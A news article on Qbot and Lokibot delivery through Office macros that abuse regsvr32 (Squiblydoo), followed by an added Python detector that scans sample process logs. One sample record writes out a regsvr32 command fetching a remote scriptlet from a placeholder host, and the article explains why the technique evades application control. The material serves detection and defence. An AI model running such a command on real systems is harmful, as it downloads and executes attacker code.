
Qbot, Lokibot malware switch back to Windows Regsvr32 delivery
2022-02-10 16:25

Malware distributors have turned to an older trick known as Squiblydoo to spread Qbot and Lokibot via Microsoft Office documents, using the Windows regsvr32 utility to run the payload.

A report from the threat research team at security analytics platform Uptycs documents this use of regsvr32.

regsvr32 is a Windows command-line utility for registering and unregistering OLE controls, such as DLLs and ActiveX (OCX) controls, in the Windows Registry. It does so by loading the module and calling its DllRegisterServer or DllUnregisterServer export, so whatever code those exports contain runs inside the Microsoft-signed regsvr32.exe process.

The threat actors abuse the utility not to make registry modifications but to execute code. In the Squiblydoo variant, regsvr32 is pointed at scrobj.dll (the Windows Script Component runtime) with the /i switch carrying a URL; the /n and /u switches keep it from touching the registry at all, and /i passes the URL to scrobj.dll's DllInstall export, which fetches the COM scriptlet from the remote server and executes the script it contains. The same loader is also used to run OCX files, which are ActiveX controls, that is, DLLs under a different extension: the macro drops one and registers it with regsvr32, and registration executes the module's DllRegisterServer code. The technique is called "Squiblydoo", and it has been employed in malware-dropping operations since 2017.

In the currently ongoing campaign, the threat actors use Excel, Word, RTF, and composite (OLE) document files with malicious macros that launch regsvr32 as a child process of the Office application.

The method gives the payload a measure of evasion: regsvr32 is a Microsoft-signed Windows binary used in many routine operations (MITRE ATT&CK tracks its abuse as T1218.010), so it is normally permitted by application control policies and its execution blends in with legitimate component registrations. The context is still detectable, however. An Office process spawning regsvr32, a command line that references scrobj.dll or carries a URL after /i:, and a module being registered from a user-writable directory such as a user profile or ProgramData are all signals worth alerting on.
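The following is an added example, not code from the article or from the Uptycs report. It runs the three checks above over constructed process-creation records that imitate Sysmon Event ID 1 fields (Image, CommandLine, ParentImage) flattened into key="value" pairs; the record layout, the sample commands, the host names and the path list are all assumptions made for illustration, and no line is real telemetry from the campaign.

```python
"""Flag regsvr32 abuse (Squiblydoo and Office-launched loaders) in process logs.

Added example, not from the article or from Uptycs. Records are constructed and
assume a Sysmon-like layout: Key="Value" pairs on one line. example.invalid is
a reserved placeholder host, not a real server.
"""
import re

# Constructed sample records (assumption: Sysmon Event ID 1 fields flattened).
SAMPLE_LOG = [
    # Benign: a vendor installer registers a control from its own directory.
    r'EventID=1 Image="C:\Windows\System32\regsvr32.exe" CommandLine="regsvr32 /s C:\Vendor\control.ocx" ParentImage="C:\Vendor\setup.exe"',
    # Office macro registers a dropped .ocx (really a DLL) from a user-writable path.
    r'EventID=1 Image="C:\Windows\System32\regsvr32.exe" CommandLine="regsvr32 -s C:\Users\Public\Documents\report.ocx" ParentImage="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"',
    # Classic Squiblydoo: remote scriptlet run through scrobj.dll, no registry change.
    r'EventID=1 Image="C:\Windows\SysWOW64\regsvr32.exe" CommandLine="regsvr32 /s /n /u /i:http://example.invalid/payload.sct scrobj.dll" ParentImage="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"',
    # Unrelated process; must be ignored.
    r'EventID=1 Image="C:\Windows\System32\notepad.exe" CommandLine="notepad.exe notes.txt" ParentImage="C:\Windows\explorer.exe"',
]

# Key=Value or Key="Value with spaces"; values are taken verbatim, quotes stripped.
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Office executables whose child regsvr32 is suspicious (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}

# Locations an unprivileged user can write to; legitimate registrations rarely
# load modules from here (assumed, tune to the environment).
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\", "\\appdata\\")

# Squiblydoo signature: /i: followed by an http(s) URL.
REMOTE_INSTALL_RE = re.compile(r"/i:\s*https?://")


def parse_line(line):
    """Turn one flattened record into a dict with lowercase keys."""
    return {k.lower(): v.strip('"') for k, v in FIELD_RE.findall(line)}


def basename(path):
    """Lowercase file name of a Windows path ('C:\\X\\EXCEL.EXE' -> 'excel.exe')."""
    return path.lower().rsplit("\\", 1)[-1]


def classify(event):
    """Return the list of check names a regsvr32 process-creation event trips.

    Order is fixed: remote scriptlet, Office parent, user-writable module.
    Non-regsvr32 events return an empty list.
    """
    if basename(event.get("image", "")) != "regsvr32.exe":
        return []
    cmd = event.get("commandline", "").lower()
    parent = basename(event.get("parentimage", ""))
    hits = []
    # scrobj.dll as the registered module, or /i:http..., is the Squiblydoo form.
    if "scrobj.dll" in cmd or REMOTE_INSTALL_RE.search(cmd):
        hits.append("squiblydoo_remote_scriptlet")
    # Office applications have no business registering COM components.
    if parent in OFFICE_PARENTS:
        hits.append("office_spawned_regsvr32")
    # A .ocx/.dll registered from a user-writable directory is a dropped payload.
    if any(d in cmd for d in USER_WRITABLE):
        hits.append("user_writable_module")
    return hits


def scan(lines):
    """Return (line_index, hits) for every record that trips at least one check."""
    findings = []
    for i, line in enumerate(lines):
        hits = classify(parse_line(line))
        if hits:
            findings.append((i, hits))
    return findings


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_LOG):
        print(f"record {index}: {', '.join(hits)}")
```

The benign installer record trips nothing, the Excel-spawned registration trips the parent and user-writable checks, and the Word-spawned Squiblydoo command trips the scriptlet and parent checks. In production the same three predicates map directly onto a SIEM query over process-creation events; the parent-process check carries the most weight, since Office applications do not register COM components on their own.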


News URL

https://www.bleepingcomputer.com/news/security/qbot-lokibot-malware-switch-back-to-windows-regsvr32-delivery/